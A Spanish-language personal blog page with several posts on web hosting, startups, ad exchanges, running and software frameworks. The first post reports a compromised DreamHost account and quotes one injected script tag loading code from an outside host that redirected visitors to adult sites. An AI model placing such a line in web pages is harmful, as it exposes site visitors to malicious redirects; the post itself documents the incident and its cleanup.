Virus en Dreamhost redireccionando tráfico

Ya perdí la cuenta de los servidores que fui comprando a lo largo de la historia y por motivos de tiempo (bueno… siendo sincero fiaca) nunca migré a un único servidor, quedandome con mas servidores que dedos en las manos.

Uno de estos servidores, es una cuenta shared en DreamHost donde tengo varios sitios de mi pasado inquieto y revoltoso.

Hace unos días entrando a uno de estos sitios para ver cómo estaba todo, descubro que el navegador me redirige a un sitio de adultos, tras haber cargado mi sitio. Raro. Pero no le dí importancia.

Días después, un amigo al que le alojo su sitio, me cuenta que muchos de sus usuarios tienen el mismo problema, al entrar en su sitio, me pasa lo mismo y veo en el código fuente del HTML la siguiente linea:

<script src="http://ators72guara.rr.nu/nl.php?p=d"></script>

¿WTF?

La parte mas extraña llegó cuando voy a editar el archivo PHP (un template de WordPress) para corregir el problema. La línea de código de arriba no está en el código fuente, sino que es generada por una función PHP que se metió en todos los archivos ejecutables PHP que tengo en mi cuenta de Dreamhost.

Por lo pronto estoy bajando todos los archivos y modificándolos en local para subirlos reparados, además de haber cambiado la contraseña de FTP y SSH.

Gracias Dreamhost por no haber avisado nada y mucho menos intentar solucionarme el problema ofreciendo algún backup reciente… ¡son unos copados!

PS, esto fue reportado en muchísimos sitios.

Viendo las startups de NXTP Labs

Hoy se anunció la segunda tanda de compañías nacientes que ingresaron en la incubadora NXTP Labs, el resumen de esto lo pueden ver en varios sitios (mi favorito TheNextWeb).

Un par de notas de las compañías que mas me interesaron:

Jampp: Por el solo hecho de que atras están los fundadores de Livra, gente con experiencia en crear una compañía, aunque reconozco que no termino de entender ese modelo de promocionar juegos online en otros juegos online. Al menos yo como publisher preferiría promocionar otras cosas y no a mis competidores.

MercadoTransporte: ¡Al fin! Al fin alguien se anima a proponer una solución a los problemas de infraestructura y logística que tenemos en Latinoamerica. Probé su sitio, la aplicación no es lo mas amigable que conozco, pero tienen todo lo necesario para mejorarlo.

Imagino que entre sus objetivos estará lograr alianzas con grandes de comercio electrónico locales para figurar como opción de envío.

RingCaptcha: No veo diferencias con otras soluciones de fuera de Latam, pero mobile en esta región es muy fuerte y ya estando presentes en este mercado es una ventaja para conseguir clientes y optimizar el funcionamiento de las validaciones telefónicas… de las 3 compañías me parece la que tiene el mercado mas al alcance de su mano.

Double Click ahora admite redes de publishers (SSPs)

Hace un tiempo hacia aca, cuando Google adquirió Double Click, tomó por política trabajar solo con publishers de forma directa. Bueno, eso no era tan estricto, ya que tenía tambien el inventario de la red de contenido de Google Adsense, que si bien es parte de Google mismo, en definitiva tambien es una red de publishers.

Eso cambió con el anuncio de hace unos días en el que anuncian la apertura a empresas que moneticen numerosos sitios.

First, we’ve revised our policies to allow publisher networks to use the Ad Exchange even if they own & operate few (or none) of the sites they represent. As always, every partner site has to meet the same high-standards of quality as every AdX publisher.

En el anuncio tambien ofrecían presentarse a un webinnar en el que se haría un demo de su Yield Management y se responderían preguntas.

No ví nada fuera de lo que uno esperaría en la presentación, aunque hay un detalle importante que solo se dijo en el webinnar y es que esto está enfocado unicamente para redes que trabajen muy cerca del publisher y no a redes de inventario long tail.

Si bien esto tiene sentido a los ojos de Google para no competir contra sí mismos (Google Adsense), me resulta dificil de creer que una red de sitios grandes (y por los requisitos de inventario seguramente premium) abrirá su inventario para ser comprado a precios de remanente en Double Click (integrado en RTB con numerosos DSPs).

Aca entran a jugar las protecciones para publishers del exchange, pero eso es para otro post en sí mismo.

Maratones en Buenos Aires

Otro respiro grande del blog, pero esta vez tengo motivos, hace un par de meses, gracias a que ahora tengo el lujo de tener un horario de trabajo estable, empecé a entrenar para correr y la verdad es algo muy recomendable!

De no hacer el menor ejercicio en años, ni tener una cultura de deporte en mi vida ni en mi familia, no necesite mas de 1 mes y medio para poder correr la primer maratón de 8 kilómetros organizada por la Universidad de San Andrés. Hay un montón de maratones organizadas por las universidades que están abiertas a que cualquiera pueda participar, no es necesario ser alumno.

Para entrenar, yo empecé haciendo cinta en un gimnasio, no encontré mucha diferencia al bajarme de la cinta y pasar a calle (en terrenos planos obviamente), lo que sí, una vez que salís a la calle la cinta se vuelve muchísimo mas aburrido y vas a tratar de hacer siempre calle.

En cuanto a la ropa y accesorios, la remera te la provee el organizador de la maratón, sí vas a necesitar unas buenas zapatillas para no lastimarte con el impacto y un pantalón corto comodo (los Nike están alrededor de 100 AR$).

Después de haber corrido la primer maratón (y haber salido 607 de 1344), ya estoy inscripto en la próxima, es una buena época para aprovechar ya que hay una casi todos los fines de semana de aca a Noviembre y se pueden encontrar en el clubdecorredores.com.

Es una satisfacción personal después de 5 años de venir amagando, finalmente haber empezado y este año sí, poder correr la Nike 10K :)

Frameworks en el largo plazo

Cada vez que empiezo un nuevo proyecto siempre está la pregunta: ¿Uso un framework? Y después ¿Cuál?

La realidad, para proyectos cortos, como los que mencioné antes, suelo usar CakePHP, YiiFramework o CodeIgniter.

Pero si estamos hablando de un proyecto, supongamos de una startup, o de mi trabajo, donde sé que voy a tener que mantener ese código durante años, no me parece lo mejor usar un framework, mis motivos:

  1. Soporte: Nunca vamos a tener la seguridad que el framework siga vivo de aca a 5 años.
  2. Adaptabilidad: Aprender de un software hecho por otro, siempre es mas dificil a escribir software propio.
  3. Compatibilidad: En cada nuevo release estamos obligados a actualizar nuestro framework para no estar expuestos a bugs de seguridad, con lo que el roadmap de nuestro equipo de programación lo dicta gente fuera de mi empresa.
  4. Seguridad: Algo que en teoría es mejor que algo cerrado, se vuelve en contra cuando, demoramos en actualizar (punto anterior), o el proyecto deja de ser sostenido por una comunidad (primer punto), con lo que gran parte de nuestro software es conocido por todos y estamos expuestos a cualquier tipo de ataque si se descubre una vulnerabilidad.

La conclusión a la que llegue en este tiempo, es que es mucho mas confiable depender de librerías y componentes, pero no de todo un framework sobre el que montar nuestra aplicación.

¿Alguien tiene experiencias en usar frameworks en el largo plazo?

En qué anduve este tiempo

Viendo que todavía quedan algunos locos leyendo, tengo ganas de retomar este blog, y antes que nada agradecerles por seguir ahi :)

Diciembre del 2008 hasta Marzo del 2011

Es increíble, pero las fechas en que estuve fuera del mundo blogueril coinciden exactamente con la etapa de mi vida profesional en que dejé de desarrollar, a fines del 2008, para volcarme al lado de los negocios en Smowtion.

En el area de negocios llegué a ser CRO, lo cual fue un pedazo de experiencia tremenda, fui a varios eventos en US de publicidad y conocí un par de oficinas increíbles en varias reuniones en las que pude participar.

Continue reading

Find me on twitter

Realmente me había olvidado que tenía un blog… abrir el wp admin, elegir un título, asignar una categoría, buscar imágenes…. ¡uy qué flojera!

Para los que todavía no me tienen en Twitter, me encuentran en twitter.com/dfgonzalez no creo que tenga de mucho mas tiempo como para pasarme a escribir por aca y realmente a la velocidad que nos movemos hoy en día no sé qué tanto sentido tiene leerse 200 feeds por día para quedarse con 1, 2 o tal vez ninguna noticia relevante (estupidos lectores de feeds sin relevancia!).

Los dejo con un mensaje de la gente que se ocupa de mantener este blog andando siempre, llueva o truene o relampaguee (aunque son sinónimos :P)

Continue reading

La mayor diferencia…

Entre trabajar dentro del equipo tecnológico a trabajar en el equipo comercial (transición que estoy cursando) es el uso del email y las herramientas de comunicación en general.

mail-shit.png

Tanto Get Things Done resulta que no sirve para nada cuando se persiguen fines comerciales!

Creo que el punto pasa porque en tecnología el email se utiliza para recibir pedidos, requerimientos y uno está acostumbrado a enviar un email y esperar su respuesta, si esta no llega, es problema de quien no nos respondió.

Mientras que en comercial, uno debe ser mucho mas push con la comunicación, si no se obtiene respuesta, se debe re-contactar y preguntar que pasó con la respuesta.

Y ahi es donde cobran sentido herramientas de email como los flags, tags, dropboxes y un arsenal de otras herramientas y procedimientos que hay que reaprender.

Si alguno de ustedes hace esta conversión tecnico-comercial, sepa que no está solo en el viaje!

Desarrolladores web de Argentina

Hace unos días Leo me mandaba por IM su último post donde cuenta su idea:

Un grupo o sitio en el que sólo encontremos desarrolladores web: programadores, coders, maquetadores, diseñadores web… Personas de perfiles variados, con nociones de estándares, de accesibilidad y de usabilidad. Que sepan lo que es XHTML y lo que es CSS. Que sepan lo que son Javascript, Ajax, JSON, jQuery… Gente con experiencia, con proyectos, con ideas. En fin, gente que no sólo sepa lo que es la “Web 2.0″, sino que también sepa como se construye.

El resultado de esta idea es el Grupo de Desarrolladores Web de Argentina, una comunidad creada en Ning y que ya cuenta con varios miembros, si sos del palo, y estás en Argentina, no podes faltar!

Un grupo asi es super necesario (tanto como el MUG cuando no estaba :P), asi que le veo un exito asegurado (siempre que los primeros miembros le pongamos pilas!).

Antidopping en las startups?

provigil.jpg Leo en techCrunch que hay una droga muy de moda entre los emprendedores de Sillicon Valley, se llama Provigil y se caracteriza por eliminar los efectos del sueño y permitir concentrarse durante largos períodos de tiempo… Focusin anyone? :P

Todos sabemos como va a terminar esto, al menos Jakob Lodwick (ex CEO de Vimeo.com y realmente un capo) ya no queda tan raro en esta foto, mas bien marca tendencia :P

jakoblodwick.jpg

Gente talentosa en la blogósfera en español

Estos días de buscar gente para sumar al equipo de Keegy me hicieron descubrir por las malas, a través de la frustración, que el talento es algo muy escaso.

Hoy navegando mis feeds, vi la enorme cantidad de talento que había ahi y hace tiempo conozco (aunque nos cueste muchísimo traerlos a Keegy, ya que la mayoría ya está en sus propios proyectos).

Peor en fín, todo esto es una excusa para jugar a armar mi Dream Team, si soñara con que puedo contar con cualquier desarrollador en el mundo, estos estarían definitivamente en el equipo, a ellos mis felicitaciones y admiración :)

Diseño: Mark MacKay (WireFrames), Walter Kobylanski (Ps) y Leandro Amato (Código).
Código iLógico (asi me gusta decirle al HTML y CSS): Federico Panico.
Javascript: Daniel Mota (el único reproche es que usa MooTools en lugar de jQuery :P).
Programación pesada (escalabilidad, servidores, etc): Manuel Aristarán y Federico García.
Integración: Armando Sosa (Perfíl dificilísimo de conseguir, sabe de todo ¡y en profundidad!).

Respecto al criterio, creo que le doy prioridad al aspecto emprendedor de las personas, luego el personal y finalmente el técnico.

¿Cuál es su Dream Team? :)

Popego-ado

popego-logo.png

Hoy los amigos de Popego lanzaron la versión alpha de su idea-loca de idéntidad en internet :)

No voy a dar tantos detalles porque no los van a leer (ya los conozco :P) y por otro lado es mucho mas sencillo si ven la aplicación directamente.

Eso que está a la derecha es mi Widget de Popego, que se alimenta de todos los servicios web que yo uso y crea mi perfil, si vos tenes el tuyo, te dice que tan compatibles somos y sino, cumple en informarte algo sobre mi identidad e intereses.

Está en super alpha por lo que todo bug que aparezca hay que mandarlo para que se corrija.

Felicitaciones a los muchachos de Popego, están haciendo un trabajo excelente… y en Argentina :D